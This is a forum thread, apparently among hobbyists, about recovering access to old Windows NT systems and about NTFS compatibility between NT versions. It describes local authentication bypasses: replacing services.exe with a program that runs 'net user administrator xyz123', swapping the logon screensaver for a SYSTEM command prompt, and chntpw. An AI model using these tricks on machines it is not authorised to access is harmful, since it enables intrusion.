"My understanding of this procedure is that I would mount the hard drive on another computer and match the Administrator password hash to a known password"
For future reference, all you need to do is temporarily replace services.exe with an exe that runs "net user administrator xyz123" (to change the password to xyz123), then reboot. Then put the original services.exe back, of course.
Not really. This is pre-ASLR, so all you need to do is push a string pointer on the stack and call an address. Probably less than 15 bytes of machine code you'd need to hex-edit into an existing exe.
If you have hard drive access you can replace the logon.scr screensaver executable with the command prompt executable, then a few minutes after boot up a command prompt with system privileges will appear by magic.
I believe the format of either the registry hives or the the way the password hash is stored changed between Win2K and WinXP, so a modern tool likely wouldn't work. That's why you can use a Windows 2000 CD to boot to a recovery console in later windows versions without a password: It thinks the registry is corrupt and skips authentication.
chntpw works on all versions from NT 3.1 through Windows 10. The hive format, nor password storage format, actually hasn't changed in all the time. :-)
Mind, the trickest part of dealing with pre-4.0 is mounting the file system, assuming the OS was placed onto NTFS rather than FAT. ntfs-3g only likes the "modern" NTFS format, which is found in NT 4.0 and up.
Mind, the trickest part of dealing with pre-4.0 is mounting the file system, assuming the OS was placed onto NTFS rather than FAT.
A couple of times I've tried mounting an NT 3.51 disk in a modern Windows 7 system and while it works (you can read from and write to it fine,) once you even mount it, NT 3.51 will never boot from that disk again. It hangs during the blue NTLDR stage.
I'm not sure what would ever possess anyone to think it a good idea to write to a filesystem immediately upon mounting it, but Windows 7 does something to old NTFS volumes which renders them incompatible with NT 3.x.
Most probably the filesystem is updated (silently), like it happened historically.
In the good ol' times there were free demo CD's of Windows 2000 (90 or 120 days trial), everyone (that was running NT 4.0) tried them.
Those with NT 4.0 already up to SP 4 had no issues (but chkdsk stopped working) all the ones with earlier service packs had unbootable machine (if the NT 4.00 was on NTFS).
At the time there were a couple "workarounds" for the CHKDSK issue, one by Sysinternals/Mark Russinovich NTFSCHK and one, Mark4NTFS by M. Tartsch.
For future reference, all you need to do is temporarily replace services.exe with an exe that runs "net user administrator xyz123" (to change the password to xyz123), then reboot. Then put the original services.exe back, of course.